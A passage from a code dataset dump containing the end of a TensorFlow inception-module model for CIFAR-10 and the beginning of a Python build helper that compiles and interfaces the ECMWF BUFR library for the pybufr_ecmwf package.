add_pre_layer_maxpool:\n # 3x3_mp\n patch_size = 3\n stride = 2\n max_pool_output = tf.nn.max_pool(seven_by_seven_conv_pre_layer_output, [1, patch_size, patch_size, 1], [1, stride, stride, 1], padding='SAME')\n lrn_input = max_pool_output\n else:\n lrn_input = seven_by_seven_conv_pre_layer_output\n \n # https://www.tensorflow.org/versions/r0.10/api_docs/python/nn.html#local_response_normalization\n # TODO: tune the following hyperparameters: depth_radius, bias, alpha, beta\n lrn_output = tf.nn.local_response_normalization(lrn_input)\n \n pre_layers_output = lrn_output\n \n # Inception module(s)\n input_tensor = pre_layers_output\n modules_output = None\n for module in modules:\n # The last module will set modules_output for use below.\n modules_output = create_inception_module_graph(module, input_tensor) \n if print_messages: print(\"module output shape:\", modules_output.get_shape().as_list())\n input_tensor = modules_output\n\n # The patch size of the avg_pool must match the patch_size of the depth_concat_output\n # I assume that the padding must be VALID based on Google's white paper: http://arxiv.org/pdf/1409.4842v1.pdf\n depth_concat_output_image_size_index = 1\n largest_patch_size = modules_output.get_shape().as_list()[depth_concat_output_image_size_index]\n if print_messages: print(\"largest_patch_size:\", largest_patch_size)\n avg_pool_output = tf.nn.avg_pool(modules_output, [1, largest_patch_size, largest_patch_size, 1], [1, 1, 1, 1], padding='VALID', name=None)\n shape = avg_pool_output.get_shape().as_list()\n if print_messages: print(\"avg_pool_output shape:\", shape)\n\n # Flatten the average_pool_output from 4 dimensions down to 2.\n batch_index = 0\n reshape_tensor = tf.reshape(avg_pool_output, (data.get_shape().as_list()[batch_index], 1 * 1 * depth_concat_depth))\n if print_messages: print(\"reshape_tensor shape: %s\" % reshape_tensor.get_shape().as_list())\n \n # Post layers\n # fully connected\n \n output = tf.nn.relu(tf.matmul(reshape_tensor, fc_layer_one_weights) + fc_layer_one_biases)\n if print_messages: print(\"fc_layer_one_output shape: %s\" % output.get_shape().as_list())\n if add_dropout:\n output = tf.nn.dropout(output, dropout_keep_probability)\n return tf.matmul(output, output_weights) + output_biases\n\n # Training computation.\n logits = create_model_graph(tf_train_dataset, add_dropout = True)\n module_weights = functools.reduce(lambda a, b: a + b, 
map(lambda m: m.get_weights(), modules))\n layer_weights = [ seven_by_seven_conv_pre_layer_weights ] + module_weights + [ fc_layer_one_weights, output_weights ]\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits, tf_train_labels) + get_l2_loss(l2_lambda, layer_weights))\n\n # Optimizer.\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n decayed_learning_rate = tf.train.exponential_decay(learning_rate, global_step, decay_steps, decay_rate)\n optimizer = tf.train.GradientDescentOptimizer(decayed_learning_rate).minimize(loss, global_step=global_step)\n\n # Predictions for the training, validation, and test data.\n train_prediction = tf.nn.softmax(logits)\n eval_prediction = tf.nn.softmax(create_model_graph(eval_dataset))\n \n saver = tf.train.Saver()\n return Model(graph, batch_size, eval_batch_size, tf_train_dataset, tf_train_labels, eval_dataset, dropout_keep_probability, logits, loss, optimizer, train_prediction, eval_prediction, saver, global_step, layer_weights)\n","repo_name":"ashleyjsands/cifar-10-tensorflow","sub_path":"inception_module_model.py","file_name":"inception_module_model.py","file_ext":"py","file_size_in_byte":17748,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"24496604601","text":"from __future__ import (absolute_import, division,\n print_function) # , unicode_literals)\nimport os # operating system functions\nimport sys # operating system functions\nimport glob # allow for filename expansion\nimport tarfile # handle tar archives\nimport shutil # portable file copying functions\nimport subprocess # support running additional executables\nimport stat # handling of file stat data\nimport datetime # date handling functions\n\nfrom pybufr_ecmwf.helpers import (get_and_set_the_module_path,\n get_software_root)\nfrom pybufr_ecmwf.custom_exceptions import (ProgrammingError,\n LibraryBuildError,\n InterfaceBuildError)\n# not used: BuildException\n# #]\n# #[ constants\n\n# the first one found will be used, unless a preferred one is specified.\nPOSSIBLE_F_COMPILERS = ['gfortran', 'g95', 'g77',\n 'f90', 'f77', 'ifort', 'pgf90', 'pgf77']\nPOSSIBLE_C_COMPILERS = ['gcc', 'icc', 'cc']\n# define common compiler flags for each compiler\n# (also used for the custom case)\nFFLAGS_COMMON = ['-O', '-Dlinux', '-fPIC']\nCFLAGS_COMMON = ['-O', '-fPIC']\n# define specific compiler flags for each compiler\n# needed to build the ECMWF BUFR library\nFFLAGS_NEEDED = {'g95': ['-i4', '-r8', '-fno-second-underscore'],\n 'gfortran': ['-fno-second-underscore', ],\n 'gfortran_10': ['-fno-second-underscore',\n '-fallow-argument-mismatch',],\n 'g77': ['-i4', ],\n 'f90': ['-i4', ],\n 'f77': ['-i4', ],\n 'pgf90': ['-i4', ],\n 'pgf77': ['-i4', ],\n 'ifort': ['-i4', ]}\nCFLAGS_NEEDED = {'gcc': [],\n 'icc': [],\n 'cc': []}\n\nfor k in FFLAGS_NEEDED:\n FFLAGS_NEEDED[k].extend(FFLAGS_COMMON)\nfor k in CFLAGS_NEEDED:\n CFLAGS_NEEDED[k].extend(CFLAGS_COMMON)\n\nSO_FILE_PATTERN = 'ecmwfbufr.cpython*.so'\n\n# #]\n\n# #[ some helper functions\ndef rem_quotes(txt):\n # #[\n \"\"\" a little helper function to remove quotes from a string.\"\"\"\n if txt is None:\n return txt\n elif txt[0] == \"'\" and txt[-1] == \"'\":\n return txt[1:-1]\n elif txt[0] == '\"' and txt[-1] == '\"':\n return txt[1:-1]\n else:\n return txt\n # #]\ndef ensure_permissions(filename, mode):\n # #[ ensure permissions for \"world\"\n \"\"\" a little routine to ensure the permissions for the\n given file are as expected \"\"\"\n file_stat = 
os.stat(filename)\n current_mode = stat.S_IMODE(file_stat.st_mode)\n new_mode = None\n if mode == 'r':\n new_mode = current_mode | int(\"444\", 8)\n if mode == 'w':\n new_mode = current_mode | int(\"222\", 8)\n if mode == 'x':\n new_mode = current_mode | int(\"111\", 8)\n if mode == 'rx':\n new_mode = current_mode | int(\"555\", 8)\n if new_mode:\n os.chmod(filename, new_mode)\n else:\n print('ERROR in ensure_permissions: unknown mode string: ', mode)\n raise ProgrammingError\n # #]\ndef run_shell_command(cmd, libpath=None, catch_output=True,\n module_path='./', verbose=True):\n # #[\n \"\"\" a wrapper routine around subprocess.Popen intended\n to make it a bit easier to call this functionality.\n Options:\n -libpath: add this path to the LD_LIBRARY_PATH environment variable\n before executing the subprocess\n -catch_output: if True, this function returns 2 lists of text lines\n containing the stdout and stderr of the executed subprocess\n -verbose: give some feedback to the user while executing the\n code (usefull for debugging)\"\"\"\n\n # get the list of already defined env settings\n env = os.environ\n if libpath:\n # add the additional env setting\n envname = \"LD_LIBRARY_PATH\"\n if envname in env:\n env[envname] = env[envname] + \":\" + libpath\n else:\n env[envname] = libpath\n\n if 'PYTHONPATH' in env:\n env['PYTHONPATH'] = env['PYTHONPATH']+':'+module_path\n else:\n env['PYTHONPATH'] = module_path\n\n if verbose:\n print(\"Executing command: \", cmd)\n\n if catch_output:\n # print('env[PYTHONPATH] = ', env['PYTHONPATH'])\n subpr = subprocess.Popen(cmd, shell=True, env=env,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n # wait until the child process is done\n # subpr.wait() # seems not necessary when catching stdout and stderr\n\n if sys.version_info[0] == 2:\n lines_stdout = subpr.stdout.readlines()\n lines_stderr = subpr.stderr.readlines()\n elif sys.version_info[0] == 3:\n # in python 3 the readlines() method returns bytes,\n # so convert them to a unicode string for convenience\n tmp_lines_stdout = subpr.stdout.readlines()\n tmp_lines_stderr = subpr.stderr.readlines()\n lines_stdout = []\n lines_stderr = []\n for line in tmp_lines_stdout:\n lines_stdout.append(line.decode('utf-8'))\n for line in tmp_lines_stderr:\n lines_stderr.append(line.decode('utf-8'))\n else:\n errtxt = 'This python version is not supported: '+sys.version\n raise NotImplementedError(errtxt)\n\n #print(\"lines_stdout: \", lines_stdout)\n #print(\"lines_stderr: \", lines_stderr)\n\n return (lines_stdout, lines_stderr)\n\n else:\n subpr = subprocess.Popen(cmd, shell=True, env=env)\n\n # wait until the child process is done\n subpr.wait()\n return\n # #]\ndef fortran_compile_and_execute(fcmp, fflags, f_code, f_executable, f_libpath):\n # #[\n \"\"\" convenience routine to compile and execute a bit of fortran code,\n and to return the stdout and stderr generated by the just compiled code.\n \"\"\"\n f_file = f_executable+\".F90\"\n tfd = open(f_file, 'w')\n tfd.write(f_code)\n tfd.close()\n\n # contruct the compile command\n cmd = fcmp+' '+fflags+' -o '+f_executable+' '+f_file\n\n # now issue the compile command\n if f_libpath == \"\":\n print(\"Executing command: \", cmd)\n os.system(cmd)\n else:\n run_shell_command(cmd, libpath=f_libpath, catch_output=False)\n\n # now execute the just generated test program to verify if we succeeded\n # add a './' to ensure the executable is also found for users that\n # do not have '.' 
in their default search path\n cmd = os.path.join('.', f_executable)\n if f_libpath == \"\":\n (lines_stdout, lines_stderr) = run_shell_command(cmd)\n else:\n (lines_stdout, lines_stderr) = \\\n run_shell_command(cmd, libpath=f_libpath)\n\n # clean up\n os.remove(f_file)\n\n return (lines_stdout, lines_stderr)\n # #]\ndef fortran_compile_test(fcmp, fflags, f_libpath):\n # #[\n \"\"\" a method to check if we really have some fortran compiler\n installed (it writes a few lines of fortran, tries to compile\n it, and compares the output with the expected output) \"\"\"\n\n # Note: for now the flags are not used in these test because these\n # are specific for generating a shared-object file, and will fail to\n # generate a simple executable for testing\n\n fortran_test_code = \\\n\"\"\"\nprogram pybufr_test_program\n\n print *,'Hello pybufr module:'\n print *,'Fortran compilation seems to work fine ...'\n\nend program pybufr_test_program\n\"\"\"\n\n # generate a testfile with a few lines of Fortran90 code\n fortran_test_executable = \"pybufr_fortran_test_program\"\n (lines_stdout, lines_stderr) = \\\n fortran_compile_and_execute(fcmp, fflags, fortran_test_code,\n fortran_test_executable,\n f_libpath)\n\n expected_output = [' Hello pybufr module:\\n',\n ' Fortran compilation seems to work fine ...\\n']\n if ((expected_output[0] not in lines_stdout) or\n (expected_output[1] not in lines_stdout)):\n print(\"ERROR: Fortran compilation test failed; \"+\n \"something seems very wrong\")\n print(\"Expected output: \", expected_output)\n print('actual output stdout = ', lines_stdout)\n print('actual output stderr = ', lines_stderr)\n raise EnvironmentError\n\n print(\"Fortran compilation test successfull...\")\n\n # clean up\n os.remove(fortran_test_executable)\n # #]\ndef c_compile_and_execute(ccmp, cflags, c_code, c_executable, c_libpath):\n # #[\n \"\"\" convenience routine to compile and execute a bit of c code,\n and to return the stdout and stderr generated by the just compiled code.\n \"\"\"\n # Note: for now the flags are not used in these test because these\n # are specific for generating a shared-object file, and will fail to\n # generate a simple executable for testing\n # libpath may point to a custom LD_LIBRARY_PATH setting\n # needed to run the compiler\n c_file = c_executable+\".c\"\n tfd = open(c_file, 'w')\n tfd.write(c_code)\n tfd.close()\n\n # contruct the compile command\n cmd = ccmp+' '+cflags+' -o '+c_executable+' '+c_file\n\n # now issue the compile command\n if c_libpath == \"\":\n print(\"Executing command: \", cmd)\n os.system(cmd)\n else:\n run_shell_command(cmd, libpath=c_libpath, catch_output=False)\n\n # now execute the just generated program\n # add a './' to ensure the executable is also found for users that\n # do not have '.' 
in their default search path\n cmd = os.path.join('.', c_executable)\n if c_libpath == \"\":\n (lines_stdout, lines_stderr) = run_shell_command(cmd)\n else:\n (lines_stdout, lines_stderr) = run_shell_command(cmd, libpath=c_libpath)\n\n # clean up\n os.remove(c_file)\n\n return (lines_stdout, lines_stderr)\n # #]\ndef c_compile_test(ccmp, cflags, c_libpath):\n # #[\n \"\"\" a method to check if we really have some c compiler\n installed (it writes a few lines of c, tries to compile\n it, and compares the output with the expected output) \"\"\"\n\n c_test_code = \\\nr\"\"\"\n#include \nint main()\n{\n printf(\"Hello pybufr module:\\n\");\n printf(\"c compilation seems to work fine ...\\n\");\n return 0;\n}\n\"\"\"\n\n # generate a testfile with a few lines of Fortran90 code\n c_test_executable = \"pybufr_c_test_program\"\n (lines_stdout, lines_stderr) = \\\n c_compile_and_execute(ccmp, cflags, c_test_code,\n c_test_executable, c_libpath)\n\n expected_output = ['Hello pybufr module:\\n',\n 'c compilation seems to work fine ...\\n']\n if ((expected_output[0] not in lines_stdout) or\n (expected_output[1] not in lines_stdout)):\n print(\"ERROR: c compilation test failed; something seems very wrong\")\n print(\"Expected output: \", expected_output)\n print('actual output stdout = ', lines_stdout)\n print('actual output stderr = ', lines_stderr)\n raise EnvironmentError\n\n print(\"c compilation test successfull...\")\n\n # clean up\n os.remove(c_test_executable)\n # #]\ndef retrieve_integer_sizes(ccmp, cflags, c_libpath,\n fcmp, fflags, f_libpath):\n # #[\n \"\"\" some trickery to retrieve the currently used integer variable\n sizes in both fortran and c\n \"\"\"\n #CSIZEINT=`../support/GetByteSizeInt`\n #CSIZELONG=`../support/GetByteSizeLong`\n #F90SIZEINT=`../support/GetByteSizeDefaultInteger`\n\n c_code = \\\nr\"\"\"\n#include \nint main()\n{\n int testinteger;\n printf(\"%zu\\n\",sizeof(testinteger));\n return 0;\n}\n\"\"\"\n c_executable = 'GetByteSizeInt'\n lines_stdout = c_compile_and_execute(ccmp, cflags, c_code,\n c_executable, c_libpath)[0]\n bytesizeint = lines_stdout[0].strip()\n\n c_code = \\\nr\"\"\"\n#include \nint main()\n{\n long testinteger;\n printf(\"%zu\\n\",sizeof(testinteger));\n return 0;\n}\n\"\"\"\n c_executable = 'GetByteSizeLong'\n lines_stdout = c_compile_and_execute(ccmp, cflags, c_code,\n c_executable, c_libpath)[0]\n bytesizelong = lines_stdout[0].strip()\n\n f90_code = \\\nr\"\"\"\nprogram GetByteSizeDefaultInteger\n integer :: default_integer, nbytes_default_integer\n inquire(iolength=nbytes_default_integer) default_integer\n print *,nbytes_default_integer\nend program GetByteSizeDefaultInteger\n\"\"\"\n f90_executable = 'GetByteSizeDefaultInteger'\n lines_stdout = \\\n fortran_compile_and_execute(fcmp, fflags, f90_code,\n f90_executable, f_libpath)[0]\n try:\n bytesizedefaultinteger = lines_stdout[0].strip()\n except IndexError:\n bytesizedefaultinteger = None\n\n if bytesizedefaultinteger is None:\n # try again, now defining nbytes_default_integer explicitely\n # as 8-byte integer, which seems needed if you compile\n # with g95-64 bit version combined with the -i4 option\n f90_code = \\\nr\"\"\"\nprogram GetByteSizeDefaultInteger\n integer :: default_integer\n integer*8 :: nbytes_default_integer\n inquire(iolength=nbytes_default_integer) default_integer\n print *,nbytes_default_integer\nend program GetByteSizeDefaultInteger\n\"\"\"\n f90_executable = 'GetByteSizeDefaultInteger'\n lines_stdout = \\\n fortran_compile_and_execute(fcmp, fflags, f90_code,\n 
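# --- editor's sketch ----------------------------------------------------------
# retrieve_integer_sizes() learns integer widths by compiling and running
# one-line C and Fortran probes. Purely as a cross-check (this snippet is
# illustrative and is not used by the build itself), the Python standard
# library can report the same platform sizes directly:
import ctypes
import struct

print(struct.calcsize('i'))          # bytes in a C 'int'  (usually 4)
print(ctypes.sizeof(ctypes.c_long))  # bytes in a C 'long' (8 on LP64 Linux)
# ------------------------------------------------------------------------------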
f90_executable, f_libpath)[0]\n try:\n bytesizedefaultinteger = lines_stdout[0].strip()\n except IndexError:\n bytesizedefaultinteger = None\n\n if bytesizedefaultinteger is None:\n txt = 'ERROR: could not retrieve bytesizedefaultinteger '+\\\n 'for this fortran compiler: '+fcmp\n raise ProgrammingError(txt)\n\n # print('GetByteSizeInt: ',bytesizeint)\n # print('GetByteSizeLong: ',bytesizelong)\n # print('GetByteSizeDefaultInteger: ',bytesizedefaultinteger)\n\n return (bytesizeint, bytesizelong, bytesizedefaultinteger)\n # #]\ndef insert_pb_interface_definition(sfd, integer_sizes):\n # #[\n \"\"\" the pb interface routines are mostly written in c, so f2py\n will not automatically generate their signature. This\n subroutine explicitely adds these signatures.\n \"\"\"\n\n #(ByteSizeInt, ByteSizeLong, ByteSizeDefaultInteger) = integer_sizes\n bytesizelong = integer_sizes[1]\n\n #intlen = None\n #if ByteSizeDefaultInteger == ByteSizeInt:\n # intlen = ByteSizeInt # = 4 bytes\n #if ByteSizeDefaultInteger == ByteSizeLong:\n # intlen = ByteSizeLong # = 8 bytes\n\n intlen = bytesizelong # = 8 bytes\n print('Using intlen = ', intlen, ' to build the pbio interface')\n\n indentation = 8*' '\n lines_to_add = \\\n [\"subroutine pbopen(cFileUnit,BufrFileName,mode,bufr_error_flag)\",\n #\" intent(c) pbopen\"\n #\" intent(c)\"\n \" integer*\"+intlen+\", intent(out) :: cFileUnit\",\n \" character(len=*), intent(in) :: BufrFileName\",\n \" character(len=1), intent(in) :: mode\",\n \" integer*\"+intlen+\", intent(out) :: bufr_error_flag\",\n \"end subroutine pbopen\",\n \"subroutine pbclose(cFileUnit,bufr_error_flag)\",\n \" integer*\"+intlen+\", intent(inplace) :: cFileUnit\",\n \" integer*\"+intlen+\", intent(inplace) :: bufr_error_flag \",\n \"end subroutine pbclose\",\n# this one is implemented in Fortran, and is handled by\n# adapt_f2py_signature_file defined next, so manual fix is needed for it.\n# \"subroutine pbbufr(cFileUnit,Buffer,BufferSizeBytes,MsgSizeBytes,&\",\n# \" bufr_error_flag)\",\n# \" integer*\"+intlen+\", intent(inplace) :: cFileUnit\",\n# \" integer*\"+intlen+\",dimension(*), intent(inplace) :: Buffer\",\n# \" integer*\"+intlen+\", intent(inplace) :: BufferSizeBytes\",\n# \" integer*\"+intlen+\", intent(inplace) :: MsgSizeBytes\",\n# \" integer*\"+intlen+\", intent(inplace) :: bufr_error_flag \",\n# \"end subroutine pbbufr\",\n \"subroutine pbwrite(cFileUnit,Buffer,MsgSizeBytes,bufr_return_value)\",\n \" integer*\"+intlen+\", intent(inplace) :: cFileUnit\",\n \" integer*\"+intlen+\",dimension(*), intent(inplace) :: Buffer\",\n \" integer*\"+intlen+\", intent(inplace) :: MsgSizeBytes\",\n \" integer*\"+intlen+\\\n \", intent(inplace) :: bufr_return_value\",\n \"end subroutine pbwrite\",\n \"subroutine pbseek(cFileUnit,offset,whence,bufr_return_value)\",\n \" integer*\"+intlen+\", intent(in) :: cFileUnit\",\n \" integer*\"+intlen+\", intent(in) :: offset\",\n \" integer*\"+intlen+\", intent(in) :: whence\",\n \" integer*\"+intlen+\", intent(out) :: bufr_return_value\",\n \"end subroutine pbseek\"]\n\n print(\"Inserting hardcoded interface to pbio routines in \"+\n \"signatures file ...\")\n for lta in lines_to_add:\n sfd.write(indentation+lta+'\\n')\n\n # #]\ndef adapt_f2py_signature_file(signature_file, integer_sizes, set_jelem,\n verbose=False):\n # #[\n \"\"\"\n some code to adapt the signature file generated by the f2py tool.\n Regrettably this is needed since this tool seems not to handle\n constant parameters defined in include files properly.\n \"\"\"\n # NOTE: maybe this 
modification is not needed if I can get the file\n # with the parameters included in an other way.\n # Looking at the f2py manpage the option -include might do the\n # trick but that one is depricated. In stead a usercode section\n # should be used, but that again means modifying the signature\n # file ...\n # Also the --include_paths option might be related.\n # TODO: sort this out (handling of constant parameters by f2py)\n\n #signature_file = \"f2py_build/signatures.pyf\"\n\n # these values are defined in parameter.F\n # PARAMETER(JSUP = 9,\n # JSEC0= 3,\n # JSEC1= 40,\n # JSEC2=4096,\n # JSEC3= 4\n # JSEC4= 2,\n # JELEM=320000,\n # JSUBS=400,\n # JCVAL=150 ,\n # JBUFL=512000,\n # JBPW = 32,\n # JTAB =3000,\n # JCTAB=3000,\n # JCTST=9000,\n # JCTEXT=9000,\n # JWORK=4096000,\n # JKEY=46,\n # JTMAX=10,\n # JTCLAS=64,\n # JTEL=255)\n\n # WARNING:\n # these numbers really should NOT be hardcoded here\n # but extracted from the fortran code.\n # However, at this point in time the interface to\n # fortran is not yet available, so for now use this\n # quick and dirty workaround...\n edits = {}\n edits['JSUP'] = 9\n edits['JSEC0'] = 3\n edits['JSEC1'] = 40\n edits['JSEC2'] = 4096\n edits['JSEC3'] = 4\n edits['JSEC4'] = 2\n if set_jelem is not None:\n edits['JELEM'] = str(set_jelem)\n else:\n edits['JELEM'] = 320000\n edits['JSUBS'] = 400\n edits['JCVAL'] = 150\n edits['JBUFL'] = 512000\n edits['JBPW'] = 32\n edits['JTAB'] = 3000\n edits['JCTAB'] = 3000\n edits['JCTST'] = 9000\n edits['JCTEXT'] = 9000\n edits['JWORK'] = 4096000\n edits['JKEY'] = 46\n edits['JTMAX'] = 10\n edits['JTCLAS'] = 64\n edits['JTEL'] = 255\n # edits[''] =\n\n # read the file\n lines = open(signature_file).readlines()\n\n # create a backup copy, to allow manual inspection\n source = signature_file\n destination = signature_file+\".bak\"\n shutil.copyfile(source, destination)\n\n print(\"Fixing array size definitions in signatures definition ...\")\n sfd = open(signature_file, \"w\")\n inside_subroutine = False\n inside_retrieve_settings = False\n inside_pbbufr_sign = False\n for line in lines:\n\n mod_line = line\n\n if 'end subroutine' in mod_line:\n inside_subroutine = False\n elif 'subroutine' in mod_line:\n inside_subroutine = True\n\n if 'end subroutine retrieve_settings' in mod_line:\n inside_retrieve_settings = False\n elif 'subroutine retrieve_settings' in mod_line:\n inside_retrieve_settings = True\n\n if 'end subroutine pbbufr' in mod_line:\n inside_pbbufr_sign = False\n elif 'subroutine pbbufr' in mod_line:\n inside_pbbufr_sign = True\n\n if inside_subroutine:\n if ' ::' in mod_line:\n # Add the intent(inplace) switch to all subroutine\n # parameters.\n # This might not be very pretty, but otherwise all\n # parameters are assigned the default, which is intent(in).\n # Maybe the proper way would be to sort out for each routine\n # in this library which parameters are intent(in) and\n # which are intent(out), but this is a huge task (and\n # should be done by ECMWF rather then by us I think...)\n if not 'intent(out)' in mod_line:\n # do this only for code that has no explicit intent(out)\n (part1, part2) = mod_line.split(' ::')\n if inside_retrieve_settings:\n # explicitely add intent(out)\n # this seems needed for the python3 case!\n mod_line = part1+',intent(out) ::'+part2\n else:\n mod_line = part1+',intent(inplace) ::'+part2\n\n if inside_pbbufr_sign:\n # fix a bug in the pbbufr.F fortran code that causes f2py to\n # fail on interfacing to this routine\n if 'integer dimension(1),intent(inplace) :: karray' in 
mod_line:\n mod_line = mod_line.replace('dimension(1)', 'dimension(*)')\n\n if 'dimension' in mod_line:\n for edit in edits:\n # the value inside the dimension() spec\n # in the signature file sometimes has extra braces.\n # sometimes not (depending on the f2py version).\n # and in case of 2 dimensions, the value to be replaced\n # ends with a comma.\n # So at least 3 cases are to be considered here.\n txt1 = '(('+edit.lower()+'))'\n txt2 = '('+edit.lower()+')'\n txt3 = '('+edit.lower()+','\n value1 = '('+str(edits[edit])+')'\n value2 = '('+str(edits[edit])+')'\n value3 = '('+str(edits[edit])+','\n if txt1 in mod_line:\n mod_line = mod_line.replace(txt1, value1)\n elif txt2 in mod_line:\n mod_line = mod_line.replace(txt2, value2)\n elif txt3 in mod_line:\n mod_line = mod_line.replace(txt3, value3)\n\n if mod_line.strip() == \"end interface\":\n # NOTE: the pb interface routines are written in c, so f2py\n # will not automatically generate their signature. This next\n # subroutine call explicitely adds these signatures.\n insert_pb_interface_definition(sfd, integer_sizes)\n\n if verbose:\n if mod_line != line:\n print(\"adapting line: \", line)\n print(\"to : \", mod_line)\n\n sfd.write(mod_line)\n\n sfd.close()\n # #]\ndef descend_dirpath_and_find(input_dir, glob_pattern):\n # #[\n \"\"\"\n a little helper routine that steps down the different components\n of the provided directory path, and tests for the presence of\n a file that matches the given glob pattern.\n If a match is found, the directory in which the match is present,\n and a list of matching files is returned.\n If no match is found a tuple with two None values is returned.\n \"\"\"\n absdirname = os.path.abspath(input_dir)\n # print('start: absdirname = ',absdirname)\n while absdirname != \"/\":\n pattern = os.path.join(absdirname, glob_pattern)\n filelist = glob.glob(pattern)\n if len(filelist) > 0:\n # print('descend_dirpath_and_find succeeded: result')\n # print('(absdirname, filelist) = ',(absdirname, filelist))\n return (absdirname, filelist)\n base = os.path.split(absdirname)[0]\n absdirname = base\n # print('next: absdirname = ',absdirname)\n\n # print('descend_dirpath_and_find failed: no result found')\n return (None, None)\n # #]\ndef extract_version():\n # #[\n \"\"\" a little function to extract the module version from\n the setup.py script, and if present, extract the mercurial\n revision from the hg repository, and store it in a place where\n the user can access it.\n \"\"\"\n\n # assume we are inside the pybufr_ecmwf module dir\n # when this function is executed.\n\n # retrieve the software version\n software_version = 'unknown'\n (setuppath, setupfiles) = descend_dirpath_and_find(os.getcwd(), 'setup.py')\n if not setuppath:\n print('ERROR: could not locate setup.py script needed to extract')\n print('ERROR: the current software version')\n raise ProgrammingError\n\n for line in open(os.path.join(setuppath, setupfiles[0])).readlines():\n if 'version=' in line:\n quoted_version = line.split('=')[1].replace(',', '')\n software_version = quoted_version.replace(\"'\", '').strip()\n\n # retrieve mercurial revision if possible\n hg_version = 'undefined'\n if os.path.exists('.hg'):\n cmd = 'hg log -l 1'\n lines_stdout = run_shell_command(cmd)[0]\n for line in lines_stdout:\n if 'changeset:' in line:\n hg_version = line.split()[1]\n\n # retrieve git revision if possible\n git_version = 'undefined'\n if os.path.exists('.git'):\n cmd = 'git log -n 1'\n lines_stdout = run_shell_command(cmd)[0]\n for line in lines_stdout:\n 
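# --- editor's sketch ----------------------------------------------------------
# Caveat on the git branch below: 'hg log' prints a 'changeset:' field, but
# 'git log -n 1' starts its default output with 'commit <sha>' (no colon), so
# the 'commit:' test typically never matches and git_version stays
# 'undefined'. An illustrative alternative that avoids parsing log output
# (get_git_revision is an assumed helper name, not part of this installer):
import subprocess

def get_git_revision(repo_dir='.'):
    # returns the current HEAD sha, or 'undefined' outside a git checkout
    try:
        out = subprocess.check_output(['git', 'rev-parse', 'HEAD'],
                                      cwd=repo_dir)
        return out.decode('utf-8').strip()
    except (subprocess.CalledProcessError, OSError):
        return 'undefined'
# ------------------------------------------------------------------------------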
if 'commit:' in line:\n git_version = line.split()[1]\n\n # retrieve the install date (i.e. todays date)\n # current date formatted as: 07-aug-2009\n install_date = datetime.date.today().strftime(\"%d-%b-%Y\")\n\n # store the result\n version_file = 'version.py'\n fds = open(version_file, 'w')\n fds.write(\"software_version = '\"+software_version+\"'\\n\")\n fds.write(\"hg_version = '\"+hg_version+\"'\\n\")\n fds.write(\"git_version = '\"+git_version+\"'\\n\")\n fds.write(\"install_date = '\"+install_date+\"'\\n\")\n fds.write(\"version = '\"+software_version+'; '+\\\n hg_version+'; '+install_date+\"'\\n\")\n fds.close()\n ensure_permissions(version_file, 'rx')\n # #]\ndef symlink_to_all_files(source_dir, dest_dir):\n # #[ create symlinks in dest_dir for all links in source_dir\n '''\n a helper routine to create symbolic links to all available\n BUFR tables in the dest_dir directory.\n '''\n filelist_b = glob.glob(os.path.join(source_dir, 'B*'))\n filelist_c = glob.glob(os.path.join(source_dir, 'C*'))\n filelist_d = glob.glob(os.path.join(source_dir, 'D*'))\n filelist = filelist_b\n filelist.extend(filelist_c)\n filelist.extend(filelist_d)\n\n # first copy the real files\n for fnm in filelist:\n filename = os.path.split(fnm)[1]\n if not os.path.islink(fnm):\n dest = os.path.join(dest_dir, filename)\n shutil.copy(fnm, dest)\n # and make sure they are world readable\n # to ensure the module can be used by all, even if\n # the setup.py build was done as root or using sudo\n os.chmod(dest, 0o0644)\n \n # then create all symlinks\n links = []\n for fnm in filelist:\n filename = os.path.split(fnm)[1]\n if os.path.islink(fnm):\n realname = os.path.realpath(fnm)\n realfilename = os.path.split(realname)[1]\n links.append((realfilename, filename))\n\n cwd = os.getcwd()\n os.chdir(dest_dir)\n for (realfilename, filename) in links:\n os.symlink(realfilename, filename)\n os.chdir(cwd)\n\n # print(filelist)\n # sys.exit(1)\n\n # #]\ndef generate_c_underscore_wrapper(source_dir):\n # #[ create macosx wrapper code\n print('starting generate_c_underscore_wrapper')\n source_file_list = source_dir+\"/bufrdc/*.F \"+\\\n source_dir+\"/pbio/pbbufr.F\"\n # print(source_file_list)\n wrapper_name = source_dir+\"/pbio/c_macosx_wrapper.c\"\n fd_out = open(wrapper_name,'w')\n for pattern in source_file_list.split():\n for fortran_file in glob.glob(pattern):\n cmd = 'grep -i subroutine '+fortran_file\n (lines_stdout, lines_stderr) = run_shell_command(cmd, verbose=False)\n # these lines are unicode strings in python3\n for line in lines_stdout:\n def_line = line.strip()\n #print('['+def_line+']')\n if def_line=='':\n continue\n if def_line[0]!='C':\n subr_name = def_line.split()[1].split('(')[0]\n #print('file: '+fortran_file,\n # 'subr_name: '+subr_name)\n fd_out.write('extern void *{0}_();\\n'.\\\n format(subr_name))\n fd_out.write('void *_{0}_() {{ return {1}_(); }}\\n\\n'.\\\n format(subr_name, subr_name))\n\n # manually add the 4 needed c-functions from pbio.c\n for c_func in ['pbopen', 'pbclose', 'pbwrite', 'pbseek']:\n fd_out.write('extern void *{0}();\\n'.\\\n format(c_func))\n fd_out.write('void *_{0}() {{ return {1}(); }}\\n\\n'.\\\n format(c_func, c_func))\n\n fd_out.close()\n\n print('Created wrapper: '+wrapper_name)\n return wrapper_name\n # #]\n# #]\n\nclass InstallBUFRInterfaceECMWF(object):\n # #[ the main builder class\n \"\"\"\n a class that builds the interface between the ECMWF\n BUFR library and python,\n \"\"\"\n def __init__(self, verbose=False,\n preferred_fortran_compiler=None,\n 
